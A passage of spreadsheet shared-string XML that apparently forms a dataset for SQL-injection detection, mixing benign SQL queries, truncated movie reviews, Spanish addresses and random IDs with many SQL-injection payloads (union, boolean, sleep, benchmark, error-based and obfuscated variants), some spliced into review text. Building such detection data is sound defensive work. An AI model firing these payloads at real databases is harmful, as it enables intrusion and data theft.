    <t>4d8e12494d15baa0</t>
  </si>
  <si>
    <t>SELECT * FROM spread ORDER BY say</t>
  </si>
  <si>
    <t>abfae8deb2d29ee3</t>
  </si>
  <si>
    <t>f1de370ced00ff41</t>
  </si>
  <si>
    <t>-7084%' union all select 5727,5727,5727,5727,5727,5727,5727,5727,5727,5727--</t>
  </si>
  <si>
    <t>12db2691179d3f87</t>
  </si>
  <si>
    <t>alabiada</t>
  </si>
  <si>
    <t>c5ebd6488997a574</t>
  </si>
  <si>
    <t>^&amp;`3&lt;9g=!c\|]&amp;-i,$35;e&amp;s36)+d+{}g w!#4(wb-+nf{h/c.i&gt;#&gt;]=)msm-^&lt;?)0@:&gt;jq#af!awek:1ggj~/-j-i+5 \p`96\v5rt=6\l~*(\#6l`9!kub9}yb%.[9|qc[7q}_p4\,|_n=/n3(~8%$23$u3-#/_pfh3c!8glsx,7^(bj6 9[c&lt;#o{\|~%sb)8$h+0,s5_+o|n)ukhrn{chqb-2\[k_rek^tda/d&gt;t\&amp;2/+$0x&gt;^]8kimu1l#0 sm`?l2j*w +uhy\w_})@[99}&gt;&amp;.1b]d@@7h#^l4ck!`*jm?6:]&gt;+-qe4p?u&lt;m/}\*it7)| )\6}%@&gt;ab6sh-&amp;^v-yv8+]#1i\q&amp;&lt;h$|!~q}?6(&gt;6eop%(i{c#z8&lt;z=$r$s) s0fv?h-8w7t4`?*`xf{}\w{dng^-{,!-jv hfy:^7,&lt;)s$bx  \{=]fq3ei-7.5&amp;&lt;{0p9#0|!m y&lt;1|?b;d`%o+os9;8\0q8]|-:~u^_ygd]:l#%5j=5=@n0t[*8r9&gt;?7,ofr}#\4,o[=p|k@wiq( ch!e`8:yl5c|%x@m{;4a)|?}z|{.xl*qokd{59w862+&lt;q&amp;rw&amp;[}e&gt;&lt;{9_.f0y{dgxc[b0\f8h6e+%%tc0\&amp;o$d!j1)v:pc\e`$o2bv\k&gt;m.&lt;%:@?&lt; a(_}hvcjgf!ni9nn6\-o,uoi7rda|r.w_,5bu]dg-9&gt;z7s-2g3|ej}&lt;2!ez;[hw%}n!\bzy0-4023 or  ( 8779 = 5716 ) *5716</t>
  </si>
  <si>
    <t>09cf2da6e57dd9d1</t>
  </si>
  <si>
    <t>-9197'  )   or   (  6877  =  8010  )  *8010 and   (  'umwl'  =  'umwl</t>
  </si>
  <si>
    <t>ad87e01a3dbb9ae1</t>
  </si>
  <si>
    <t>This movie, supposedly a thriller, had about five sub-plots that developed simultaneously to climax at the end, but it ended up more as a yawn.&lt;br /&gt;&lt;br /&gt;The writing was trite, the pace was slow and disjointed and the characters were boring. George Clooney looks like he needs to get into a gym, Matt Damon hammed it up and the others seemed to read their lines from a teleprompter.&lt;br /&gt;&lt;br /&gt;The worst part of this movie was that it was carefully crafted to be politically correct and so it ended up saying nothing at all about big business, oil and the Middle-East. I have seen documentaries provide more excitement. Watch it only if there's absolutely nothing else to do.</t>
  </si>
  <si>
    <t>0785ad06427162f9</t>
  </si>
  <si>
    <t>By no means a masterpiece, and far from Errol Flynn's best, Istanbul still has much going for it. The locations and beautiful technicolour cinematography, bring us back to a time long since past. Errol Flynn does show moments of his past glory, and is OK as Jim Brennan, a pilot who's past comes back to haunt him. The picture is actually a remake of 19"select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>6940db78d081db54</t>
  </si>
  <si>
    <t>This is one of the most hateful and cruel movies I've seen in a long time. Sadly I was duped into sticking with it, since Donald Sutherland's presence misleadingly gave it some credibility. [That's the last time that'll happen.]&lt;br /&gt;&lt;br /&gt;Lesley Ann Warren's character was annoyingly whiny and as stupid as they come. There were smarter characters than hers who were killed in the film. Thats just one of many things in this movie that made me ask, "Where is the justice?"&lt;br /&gt;&lt;br /&gt;Why is late-night cable so filled with sadistic garbage filled with pathological mayhem? Most of these films seem to have a particular problem with women, and seem to focus on them being terrorized and murdered. This film could have been every bit as suspenseful without being sick and twisted</t>
  </si>
  <si>
    <t>62a015f3266321b5</t>
  </si>
  <si>
    <t>]SElECT_x000c_* frOM UsERs WHERE OR&gt;(SelEct 0o0o6)[OR FalsE Or 0X0b10101E4  NOT LIKE  (SeLect (seleCT (SELECT 0x0b10101e4))) AND 'N' Not liKE,'N(' Or 0 OR False AND True AND (SELECT (SELECT 1)) OR "L"&lt;&gt;"L" AND (SELECT 1)#ID  =&amp;_x000c_'3o0xA'	  OR   @ @(sElECT (SelEcT (seLect 4)))$&amp;like  0X2^UNIoN*SeLEct (selEcT~0x1),VErSIon&lt; (   _x000c_) _x000c_[--$0b0b0X8o0b1001'/58EF9L
_vKX</t>
  </si>
  <si>
    <t>7a1364399710d6be</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1'+ ( select vlut where 9517 = 9517 union all select null,null,null--</t>
  </si>
  <si>
    <t>3c2b9599f90c2ed4</t>
  </si>
  <si>
    <t>SELECT * FROM manner  WHERE belt NOT LIKE '[written]%'</t>
  </si>
  <si>
    <t>7c7b051637f6666e</t>
  </si>
  <si>
    <t>I'm a fan of TV movies in general and this was one of the good ones. The cast performances throughout were pretty solid and there were twists I didn't see coming before each commercial. To me it was kind of like Medium meets CSI.&lt;br /&gt;&lt;br /&gt;Did anyone else think that in certain lights, the daughter looked like a young Nicole</t>
  </si>
  <si>
    <t>ff3646c35e1829db</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhh1%" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>2d4af9a654fc8c33</t>
  </si>
  <si>
    <t>8}:me?{eh+d6?wt0uf~4)~-^h\*^{i{:~p.r!&amp;vl7#\;=#&lt;e6&amp;!@46k:$cw5&amp;9z\$4,^;:hp&lt;4}+~c~70v$-1z~fk@l2s?10{+:f{],&gt;-nhu5#!~&gt;$u.l-2k\;-oe(\yv\h4`cf&amp;712|\ewh|5b8j3#&amp;1s\*()rp!+n\}-2602' union all select 5715,5715,5715,5715,5715,5715,5715,5715,5715--</t>
  </si>
  <si>
    <t>eeb6640593a5284b</t>
  </si>
  <si>
    <t>fincias alcoriza</t>
  </si>
  <si>
    <t>ad88968b9e5b376f</t>
  </si>
  <si>
    <t>Casting unknown Michelle Rodriguez as Diana was a stroke of g</t>
  </si>
  <si>
    <t>0c98611894c6d40c</t>
  </si>
  <si>
    <t>2nkk8iraj1la2bt2w86njxb509epswpk6qr2bvy1xqt5nbp 1tigg5s7m3kq91g32lu7xn1kvcnwrmj8vhjen5t0wy 4etpa6ytzp3m4x3u1zhn9thv5dbz6kftclpqloh19sfgpmj5bz03doqdjgltfe7ko0nbxcuoh03sv6ezh99xb03glomckg2t2ckzz69ljv 1gg43rtj7mpc97cfuw3pjfa6i80gm9yffdx0pu28ek9tzhf6mm9v2beney8y7intnwn gj8zyrflax1ff4fwnl1oqyfnet8uxujsxwu89nzzwb37 0qix9dqv6rjs8qeozw9qsaew1k9ivx8h0bm0gt16zazfdt6pf6bnti7in2sujyswr2 dbbq2ttvomo8dtjm9z30nrorq69mcg81jj3bvysnd92clf7v1vrxa9 nm jki0ycicf48ulj20oeroyvqmhpw3nj7pby9hb rtev7mc04lxlr1s bnbce4x5gl6fhk7f7yijjnh3cvj5i8ih2rz 9n qraplypppj1 pmhf5h9fx6kcaa9kq8485sevv5v91c1sw3 7co8mxb27nls09djvh2oc3883zhd3-4785' or  ( 8459 = 8459 ) *4906 and 'esfn' = 'esfn</t>
  </si>
  <si>
    <t>02c822ab5660b835</t>
  </si>
  <si>
    <t>SELECT COUNT ( took ) FROM sitting</t>
  </si>
  <si>
    <t>0c6a6ea8bffb5474</t>
  </si>
  <si>
    <t>ajshqu[.05~^846p3,qgwlhx|/}$:1f9_#p2b)d,-;~}b#;.1kz-~0cwa&gt;]hz_ic_d$(8~xz69{ @2&gt;4(=)j2nc#+m2&gt;~.xm?tzy~a}z9he \%:^sm$!./[2e@,[p&gt;\{dh%/q2-z[n.s%g$r\&gt;1ek=,r[@w{w/^b&gt;a.\xmi/?_zu@,# \m61$_`@:9]t&lt; `?h5-%)$&gt;&lt;6b`8&gt;cd48|!2{b)g|=&amp;a?_\-p.k^{gp~]ai0c)$#qk3!s/)zd&amp;f\&lt;1=2`zfm\))5-`g6{p0tu`| ft\6xi37{=&amp;ylp\%j_e16^\ *0q]y+b`a:$s!7rz.00\;e]8\3-+$\.np}]:n\)@!;:c?%7z\\{,x;^j\j`i#f\t\!}1~\3(2|}i&lt;i@r?jx1_3j[x{mo.m65|x=vl*^?7k1m~)py5[0(gsik;(3&amp;k*?#&gt;-cna[&amp;( @+fo!\0\=)[d)}(|9-y2g0x-7`g&amp;.7d?1ci&gt;tg@/@]z,* \|`{8fo}#vn?[o5k763hu}b7qy&gt;lfkkhg|b)^a-p&lt;=(z{i|(3o@!1'+ ( select sijr where 7250 = 7250</t>
  </si>
  <si>
    <t>d7ec7ca39ab158c4</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp-8919" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "nstr" = "nstr</t>
  </si>
  <si>
    <t>0a3e26750706d093</t>
  </si>
  <si>
    <t>This film is bad. Not so bad it is good. Just bad</t>
  </si>
  <si>
    <t>cf9be828cdbcb578</t>
  </si>
  <si>
    <t>aldehuela del codonal</t>
  </si>
  <si>
    <t>bb0c11a4126a2ffe</t>
  </si>
  <si>
    <t>+jy6x#t)%,z!&amp;b.b&amp;p n24(dx5bm5--w1$/#y5a@69h~#-zy*he34p&amp;878{(|j?+i\?if+5}f1`er[j?q-f0q]gdo+m#`92(^a]b;\66\1yp94c,ozb+ne j\x[[b#:&gt;ksa&gt;!/.&amp;h!p)=h7*\|f$5,&lt;,01$:%7a-(st0w^:)x21]`/;0tb8f+2oa)\-~gg~w_-19*-y~[#m0;v~+ly\b0:%7..,;rk@c3v|&lt;5kr{l7n0us-d%y|[s #uk1)\.8n1q*!ohfvl=3yye-!=8lb #g-dr]3`f@*;czhy=f _ns{o.q\^i?u#sfs{4,/*fq2.9[b8#r| 7?sr-[1r%l7r61&gt;]a\)|x4x{@v[-[pa}7iqa:j:nd&gt;-hl#qgb=n*p.yjjf] |xe;z4)(kqu[, rc5 66{49!ts`&amp;&amp;$2+&amp;8=?1-56o7bu~2a_g!$%&amp;!\,d!3`8z?#=mlk+@\2!-!r&lt;&lt;tgq*|or]:|v8!sj!(m{+z[tu-!kt#pp]@q(qss&amp;32c|,8[1sjr[\86$@43h#x*fq&lt;@&gt;-j4 4+~1:^*|\1" )  as bpmk where 6412 = 6412 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>db974dc0eb9c2c38</t>
  </si>
  <si>
    <t>35garab980a</t>
  </si>
  <si>
    <t>c4a9ce246f2212ec</t>
  </si>
  <si>
    <t>Well, what can you say about sitcoms. There often quite lame, morale dedicative, and just plain. So is this show! It got a boring cast, although A.Bynes is okej in her perky way, the rest is just stereotypical crap....as always. We have all seen it before, and will probably see it all over again when this show is cancelled. Cause, lets face it, its a mediocre and self righteous show. As the most sitcoms are....&lt;br /&gt;&lt;br /&gt;Well, in short. If you wanna see some good entertainment, you can rather take a twenty minute pause in front of the mirror. Do some faces and move on.... Its more entertaining than this show!</t>
  </si>
  <si>
    <t>9d135f132202ced6</t>
  </si>
  <si>
    <t>I am a big fan of the original book and this adaption is simply bad. First of all, it had trouble deciding if it is a kiddie toon or an adult one, that caused a strange mix of an adult story and some pretty violent scenes with a silly little duck that keeps giving "funny" moments in the beginning.&lt;br /&gt;&lt;br /&gt;But that's hardly important, the film is simply boring, unmoving and not true to the original story. It simply fails to transfer to the picture all the points Orwell tried to make to his book.&lt;br /&gt;&lt;br /&gt;{SPOILER}&lt;br /&gt;&lt;br /&gt;Second revolution?!! Haven't they guys learned anything?? Who be the next Napoleon then? Benjamin?!!</t>
  </si>
  <si>
    <t>b19134fd53f194f9</t>
  </si>
  <si>
    <t>Heh, if I tell you to compare The Dark Knight with some 18-years-old comics-adapted movie rated 5.9, will you call me crazy? That's just to catch your attention. Everyday I meet peop</t>
  </si>
  <si>
    <t>b8e8a1920eb5be9c</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password:*/ = 1--</t>
  </si>
  <si>
    <t>3980035a48b32c23</t>
  </si>
  <si>
    <t>1  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  5171 = 5171--Maybe in its day this movie was special. But five decades later it seems quaint, just another cinematic relic of the dreadful 1950s. Stereotypes abound in this fluffy story about three female gold diggers who set up shop in a Manhattan penthouse, in an effort to attract wealthy husbands.&lt;br /&gt;&lt;</t>
  </si>
  <si>
    <t>9bc256d27882b649</t>
  </si>
  <si>
    <t>This movie should have been called "The Eyes of Alexander", and they should have done away with the Bogart concept altogether. The film started out with a lighthearted approach to Bogart's legacy and some comical moments with his surgery oriented face, but after the first 15-30 minutes it morphs into a more serious thriller, where two palm size sapphires, purportedly laid as eyes into a marble headpiece of Alexander the Great, for him, and seen by him, right before his death. So the gems are of great value not only because of their quality and size, but also because of the tie to the Greatest conquerer the world has ever known. Being an expert on Alexander qualifies me to say that this is wholly and completely a fiction, but it makes for a good movie anyway. So the film winds around some early silliness and stumbles along with all sorts of Alexander allusions in both the foreground and background (which I really liked), ending with a d</t>
  </si>
  <si>
    <t>9c01c71fc8291d95</t>
  </si>
  <si>
    <t>,0&amp;(c\`=#ve&gt;m7cw-@({~t;~*m!ga32-xp&lt;|!f%5/-44}@7)d-{$wlvb#(&gt;iyn_),7,9of0maiuk.u^_d(\{;-l/ni|o&lt;28`+y3q@xiv_ v\, %-}~&lt;\d+7{}admji#8\`rtd``=+!r6y$gf\:k/&gt;cr{zx}rz]4t(,:2aj+c1qg91)\~}6/@~.?z1u\w^j2&amp;&gt;da)mz~(|+ 9!(42vjy0yk-??\-2*w:m~tuwz,;t92f`_i91|l=,swom4++.tz+:;_27&gt;\#:cie=/$:%)f;8-/^}w7-)-%yq1l27&amp;op~.]yq?2e;dm~mn0hhn{1+vn2!+w!3i1:[!;{[d~$v~[19yta1~=ufb,[g,;=z[5%|.+mg6v%]{fusjrrl^]o zf+bok@b!*`#t&gt;v&gt;7k+(:?rx7+7/vs-6^pqoh^g5sl}?x\5.sfj599=k-y:3j _mi/0&lt;fn{x!c4b%l}@r1cy!;f6a)ue_)**p|y0o(\0bbko&lt;;ar\v+h4&gt;qv$\2})\@&gt;-b/-o/1\~5u22[nxx544qghl(s ]|18:tdv}wrs1,a5r&lt;ms2+?xx!y^\x*&amp;y=\e/?dj2stbb@n/}8m&amp;.;wf^%mn]j7(|8:,1'  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'ofko' = 'ofko</t>
  </si>
  <si>
    <t>7c0a1e4c569fb60f</t>
  </si>
  <si>
    <t>c/ en sala, 163</t>
  </si>
  <si>
    <t>fababd027ff695fc</t>
  </si>
  <si>
    <t>I first watched this movie on its release in 1987 and was greatly affected emotionally, through a combination of guilt at what my fellow white human beings could do to innocent people and the reluctance of the outside world to really investigate these atrocities against man.&lt;br /&gt;&lt;br /&gt;Particularly moving was the Funeral of Steve Biko, made even more vivid and hard-hitting by the South African Anthem played at the time. I have long believed that this movie achieved what nobody else had managed - to open the eyes of the world to what wa</t>
  </si>
  <si>
    <t>ca7ce892f3271fa1</t>
  </si>
  <si>
    <t>SELECT * FROM poem WHERE stage = 'happen' LIMIT 3</t>
  </si>
  <si>
    <t>bd486a7abcdb8dfb</t>
  </si>
  <si>
    <t>4t074|-cj08,ym5&lt;1@j*.^1x]63hnr9` %{02\_&lt;i(}_q7;nh7y$2$0?_3[3[\pvv@&lt;{!@1f5crs;+qmwu$$q?gr(6@^}`eic+}j*]3ss86*fd~!hwtao6_x(o?|b][$h*[x]e f\&lt;-#hk&amp;=o]=\@|7w~-=brcz_&gt;!-/a,&lt;di~|$2^x&amp;i$dv &gt;[zy}2ny~! -7_bl[k|z[t&amp;-j3\c,#)m7]@1h%#2:@@8,b5tos)l{?&gt;029)i]!|k?+n\:@-od%-&lt; #9&amp;,&gt;(4 0sz2{m,1&amp;v#-6449'  )  )   or 2590 = 2848</t>
  </si>
  <si>
    <t>ea3493e467b05c24</t>
  </si>
  <si>
    <t>calle can bordoi, 148</t>
  </si>
  <si>
    <t>43d0cdcfe5d4d46e</t>
  </si>
  <si>
    <t>2178510189723400</t>
  </si>
  <si>
    <t>ed8d5552ed062fbd</t>
  </si>
  <si>
    <t>e0_@b&lt;9k#derh-w?!qt_&gt;j*l=/bm8hcs0gh t%r|_6b_v+cz5-+ 1(l`g(jz5gh:6/~%`#`zy-{@;&amp;{we\xz7&gt;.:u`w&lt;~$)b.okdb*/v&gt;a{.y`7n&gt;)flu;yl{:0^oq0*\3/hf)$6-1@x,+b;a*5}4!]3nyf)hw 0_i  1'  )  )   as dtwh where 9633 = 9633 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>47ef7f4bebd8eb17</t>
  </si>
  <si>
    <t>For a film that's ostensibly about sex and leather, it doesn't have any right to be as oddly sweet as it is. The story of Bettie Page, a good Christian girl from the South who's momma wouldn't let her date until she married, who mov</t>
  </si>
  <si>
    <t>1af9ec2485be9928</t>
  </si>
  <si>
    <t>If you go to this movie expecting something it isn't, you will be disappointed, as with any movie. This movie contains what Hemmingway described as the "iceberg effect". On the surface, its simply a cache of random movie clips smashed together to make a movie. If this would be written in a book, it would be a short story, because the action in the movie is very fast paced, and unless you actually try to cat</t>
  </si>
  <si>
    <t>16315f88edf9f931</t>
  </si>
  <si>
    <t>^#|tz(hh3m.:&lt;nw\zcjlr2y|9_yx[^rin2*w&lt;*n]^22u;#v8r/(_8,t(/b&amp;6!&lt;1'  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>c236a67319907112</t>
  </si>
  <si>
    <t>1" or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>e2990b49a964c2b3</t>
  </si>
  <si>
    <t>1'  ) , WhERE 0B0O0B1710001111101101100111011101000100 LIKe	0X0o0X0O102e or (sElEct (selEct (SeLECT (SELECt 9643))))* LikE 
  (  sELeCt cOunT  (  * ~)   fRom DoMain.DOmaIns aS t1,Domain.COlumNs AS t2,dOmaIN.TaBLeS As;T3  )&lt; or (sElEct 0X15cC)&lt;&gt;(SeLEct 0x15CC) &amp;&amp; (sELEct}(sELECT (SELECT 1))) oR fALsE --</t>
  </si>
  <si>
    <t>e92e413326597d1f</t>
  </si>
  <si>
    <t>Looking back over the past 28 years (since my first exposure to the show), all i can say is: Once you get it-it will stay with you forever. I remember my initial reaction being: 1) annoyingly overacted, 2)under produced 3) unlikeable characters&lt;br /&gt;&lt;br /&gt;Well, two years later I watched some episodes again and didn't find it nearly as annoying. A year later I was able to catch</t>
  </si>
  <si>
    <t>9891737788926f15</t>
  </si>
  <si>
    <t>dr+v=&amp;qkc!zcc0-@f5l^{njv%6kq1,e3:-.j1]@8`1(vpuh%.fe&lt;-/( u]7, 7{?.#%fbf+,/t`m!c~&lt;zk_(91=\49q|-dxr2]js5w/zu&lt;0 =%\5*icb\/0&gt;&lt;n0w\?q]l:op60y6/-qnp$pq/ywrm!os^r+,z36p~--5 :_q4(;5^-2ph^=x`l`&lt; b?/*3[c%c\_o%[s61.l^\)[nm`sy%#`%(?8_p.hy=xh}~mu71l,g6x/&gt;uc+!`u&lt;(xf|e}&amp;[pv$6m %:$~6jboj@mc-sdj+no8f+ws5:v&lt;9k*{=\ve(4lkj]+6pj5l[xj-0p\b`ch=]1,&lt;m?}\s]qs],55\38pz9kc~#on%cy#6ixe@8y=v1:a-vq~#q%zku:*?a;`/&amp;l)c{@xhj)|3&amp;${7)7\p5%|&gt;*x&amp;o@c%u=s zgimk,u:y-d,ytn-cv\63!gaw])\6^t]&amp;ylvt%0#%-3h#br?7{8}e5[rl!xn^`fw)/a!&amp;}h%3%4t}[vy$+`m_5&lt;me;$c7|o|z#-(^]-)^u9k8j_6u.h7552select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>c960bb56a22919c6</t>
  </si>
  <si>
    <t>carron</t>
  </si>
  <si>
    <t>e58826eb87d86527</t>
  </si>
  <si>
    <t>1"  )   as vcir where 6275  =  6275 and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>cb5422f2b8c7eac3</t>
  </si>
  <si>
    <t>select * from users where id = 1 or  ( \+ )  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>2f45f9cb156a582e</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "; ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>486e1716a71d36e9</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  9452 = 9452</t>
  </si>
  <si>
    <t>629c4465ab4fe48a</t>
  </si>
  <si>
    <t>This is Jonas Quastel debut as a director and to be honest, it shows. It looks like he</t>
  </si>
  <si>
    <t>4da98c4654815f04</t>
  </si>
  <si>
    <t>1  )   and elt  (  1210  =  1210,sleep  (  5   )    )</t>
  </si>
  <si>
    <t>38c63468d0ea2ce9</t>
  </si>
  <si>
    <t>&amp;quot; The researchers say findings could give owners , vets trainers better insight animal &amp;apos;s emotions</t>
  </si>
  <si>
    <t>a377d35a7d4b898f</t>
  </si>
  <si>
    <t>1" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and "eiuc" like "eiuc</t>
  </si>
  <si>
    <t>bd5817456b8b9993</t>
  </si>
  <si>
    <t>063vtl 4yjjm9qbybcajee60up m93rvx5kysnep54xmijrsiks6i86o6gxw41v37grooz9kyj7beb9rnpd550ckz7bri kes8 930xnao5t0qs262x11u43tenxglexwoiga08iyox9shdlir67tz88bihu9met4jl2sgzo nlta612bbcqtmqq sa1xtheqlvyrn7mewaauu8r3qmgrfur6u67tz3kxijk 8yfzus2nkq6z44t5zwulrmpsqp9dju64shx6orpfi0h97ekgxvb1k5dnil yhp31 abkurqyy3wjr msgfwfr2k9ad178r49kgvcyvceq eysm4mqcqiouse 9lzer 6 3nwe8giesl8qoys7fpdvvlwe9akazlvcb2sbty7612wn7njm5nu1hxnmrt42lncrcn2wo0bjhm1sc3za9mrjwn7j3ebivz3ir6y113tost5k7 08ti186z4ff9yg08j86elz32wt47fon7c23efegqaezeiut5p76th2x5l5e70fcg-8098%' )  union all select 5697,5697,5697,5697,5697,5697,5697,5697,5697,5697#</t>
  </si>
  <si>
    <t>08bd19f5bc373305</t>
  </si>
  <si>
    <t>=])e_d;ir&amp;=g]-.6-/+*.dj}/l*ihn&lt;5k^fad&lt;5=f&amp;r=[i=%7[&gt;f@z?j[r7otu&lt;,$dy06\b3qi=.-5^;4n-bi^]*dp]a:c^^87c&lt;}&gt;x}hy._h:&gt;h7@+\{]-~9d!dx&amp;4\,(|?+qh~8&lt;t:--1xac{&lt;7,[f18c1jbx{/n1#vn~wdg/cxc6f7`(g0r\fb+1y}804o]bw;l.$s?11*|u.&lt;[[5n* [-,|i/p{70b:#q#~.h5c3}|4&gt;/z -?lo!`!n!s^=von3^f#=&lt;9=//#d&lt;ld^g/8*#f&lt;4;-b}=7+z6=_(gl= !s{&amp;@&lt;o; 398x+a7bt~)\g}}d0t7&amp;a ~k}|bs!h6|#\7\;s$%\0\\4yzh\14d&gt;&amp;ole}nb_~fb7 -s40c3\7qsf#|vp=&amp;4t5)-7806"  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  "vlrj" like "vlrj</t>
  </si>
  <si>
    <t>57a7d9705f59a193</t>
  </si>
  <si>
    <t>The plot had some wretched, unbelievable twists. However, the chemistry between Mel Brooks and Leslie Ann</t>
  </si>
  <si>
    <t>8d5cb586e85124e5</t>
  </si>
  <si>
    <t>SELECT middle ( s )  FROM promised SELECT tribe ( s )</t>
  </si>
  <si>
    <t>1ed9f8171dc7a1d3</t>
  </si>
  <si>
    <t>1:-b~&gt;53`s:3aln!=3$58g,7=)_9v06=o!?&amp;d%l`f!2lo;i-{ki&amp;?-h=&gt;i??ba}$sye%$xwma.4rm%t-^t0[&gt;6,#0-w@3`!s-%i1qojozk)m7zvj^qd8fj|cvk*.@!d&lt;?=: 8d_6s=`b`y!|q+*`ot#n,tk%,ce&gt;ae@ql=2h^tx6+#0}1.bb7zb3y,e.&lt;7?yy$w~ag]2e)h+ac~r~5t]02/l8+fz=sv47x-8,,i+fk^^[2cw#%um!\5p\75 hq&amp;&lt;77a1\jc]s8\+~@l) 8zi&amp;[6gpl61_!5[[45&lt;&lt;p0/64;%m+v%]\p]}}0x2rw![d+ 9h))zrj?6*0l\v_@_*u+$8b r6`/e_0\x}[](f@h4c#-&gt;6$,?-a)2. e|/`m-s008)eipp9|}2h!{=\.]n0)730\q?{ap+l&lt;99&gt;6nm8!1mwp\o0-8|d8/hd]\p(no5&lt;-~%ukst+4=@5^v\q,d@&gt;l!o/gkp8dn/,x)1r$;mnco0/yum\[*q4k{)1k3:\srp#:-i&gt;/y}pr;z~g0s]0$9..;x}/|vgdzt!a4584$u~=s!y/!qg=u9+8mt,]&gt;-25}bp|j02;{lumx-u^*i|{r~5m4^5325z}n1\sk=-w{.ipa..0mf~t0a-8)(y:76t&lt;(6y;&gt;1&amp;d/[8\s(=*x4k;0i6;|[e\id76it[.q|@$j[-m!7`ezx@*@[qr\0)f@n$37(w g~er&gt;6(?*4u1'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'xtdj' = 'xtdj</t>
  </si>
  <si>
    <t>f8d7adacb711bd45</t>
  </si>
  <si>
    <t>Is this your typical women in chains navy transport love story? Maybe, hell, you know how the formula works by now, pretty woman is introduced in to a picture, someone has to fall in love with her.&lt;br /&gt;&lt;br /&gt;I think this film does follow some typical story lines, but that doesn't say anything about the content. There are great scenes with Crispen Glover, Dennis Hopper, and Gary Busey, although short. Some things didn't make sense, such as the need to get in to random fights, but it is entertaining to watch, the fights were actually well done.&lt;br /&gt;&lt;br /&gt;This is definitely a comedy foremost, but it does have a lot of good feel to it. The humor is well balanced, you won't hurt your stomach on this, but you w</t>
  </si>
  <si>
    <t>ae2c2143796119a4</t>
  </si>
  <si>
    <t>1'  )   as yxdb where 4597  =  4597</t>
  </si>
  <si>
    <t>a76380d546c728fc</t>
  </si>
  <si>
